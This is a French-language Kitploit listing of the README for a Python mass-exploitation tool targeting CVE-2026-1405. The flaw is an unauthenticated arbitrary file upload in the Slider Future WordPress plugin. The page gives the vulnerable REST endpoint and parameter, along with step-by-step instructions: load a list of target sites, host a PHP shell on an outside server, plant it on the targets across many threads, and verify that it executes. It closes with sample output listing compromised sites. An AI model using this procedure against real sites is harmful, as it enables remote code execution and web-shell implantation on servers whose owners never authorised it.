Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-1405 — Slider Future <= 1.0.5 - Téléversement de fichier arbitraire non authentifié | Kitploit
Outils/GitHubGitHub/nxploited/cve-2026-1405
Génération de PayloadsExploitationScripting et AutomatisationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubnxploited/cve-2026-1405

CVE-2026-1405

Slider Future <= 1.0.5 - Téléversement de fichier arbitraire non authentifié

Voir le dépôt
41il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-1405

Slider Future <= 1.0.5 - Téléversement arbitraire de fichier non authentifié

🚀 CVE-2026-1405.py — Outil d'exploitation de masse Slider Future

🩸 Aperçu de la vulnérabilité

Composant : Slider Future (plugin WordPress)
Versions affectées : ≤ 1.0.5
Vulnérabilité : Téléversement arbitraire de fichier non authentifié
CVE : CVE-2026-1405
Score CVSS : 9.8 (Critique)

Le plugin WordPress Slider Future est vulnérable au téléversement arbitraire de fichiers en raison de l'absence de validation du type de fichier dans la fonction slider_future_handle_image_upload dans toutes les versions jusqu'à 1.0.5 incluse. Cela permet à des attaquants non authentifiés de téléverser n'importe quel type de fichier—y compris des shells PHP malveillants—directement sur le serveur affecté, permettant ainsi l'exécution de code à distance.


⚡ Fonctionnalités de l'exploit

  • Exploitation de masse sur plusieurs cibles.
  • Utilise le point de terminaison vulnérable : /wp-json/slider-future/v1/upload-image/
  • Téléverse un shell PHP distant via le paramètre image_url (aucune authentification requise).
  • Vérifie automatiquement l'exécution du shell en recherchant les signatures définies par l'utilisateur.

🛠️ Instructions d'utilisation

1. Préparez un fichier texte contenant vos sites WordPress cibles (un par ligne) :

root@kitploit:~
http://example1.com
https://example2.com
...

2. Hébergez votre shell PHP en ligne et ayez son URL directe prête.

Exemple : http://yourserver.com/shell.php

3. Exécutez le script :

root@kitploit:~
python3 CVE-2026-1405.py

Vous serez invité à fournir :

  • Fichier de cibles : Le chemin vers votre liste de cibles (par défaut : list.txt)
  • URL directe du shell : Le shell en ligne et accessible que vous souhaitez téléverser sur les cibles
  • Signature du shell : Une chaîne unique dans votre shell pour la vérification (par exemple Nxploited)
  • Threads : Nombre de threads parallèles (par défaut : 10)

4. Sortie

  • Les résultats de l'exploit sont affichés en direct sur une interface professionnelle propulsée par Rich.
  • Les cibles réussies et les URL des shells sont automatiquement enregistrées dans success_results.txt.

📝 Détails du script

  • Nom : CVE-2026-1405.py
  • Auteur : Nxploited
  • Langage : Python 3
  • Bibliothèques : requests, rich

Comment ça fonctionne

  1. Envoie une requête POST au point de terminaison vulnérable de chaque cible :
    • URL : /wp-json/slider-future/v1/upload-image/
    • Paramètre : image_url pointant vers votre shell.
  2. Analyse la réponse JSON pour extraire l'URL du shell téléversé.
  3. Visite l'URL du shell et recherche votre chaîne de signature.
  4. Affiche le statut : succès ou échec pour chaque cible.

⚠️ Avertissement légal

Cet outil est uniquement destiné à des tests de sécurité éducatifs et autorisés.
Toute utilisation non autorisée contre des sites dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas explicitement reçu la permission de tester est illégale.


💡 Exemple de sortie

root@kitploit:~
Exploit For: CVE-2026-1405
By: Nxploited

Targets loaded: 12
Shell URL: http://yourserver.com/shell.php
Signature: Nxploited

2026-02-20T16:05:23.123456+00:00 | http://target1.com -> SUCCESS | Shell Verified: http://target1.com/wp-content/uploads/2026/02/shell.php
2026-02-20T16:05:24.542342+00:00 | http://target2.com -> Upload failed or shell URL not found.
...
Finished: 3/12 succeeded in 14.7s
Saved successes to success_results.txt
Télécharger l’outil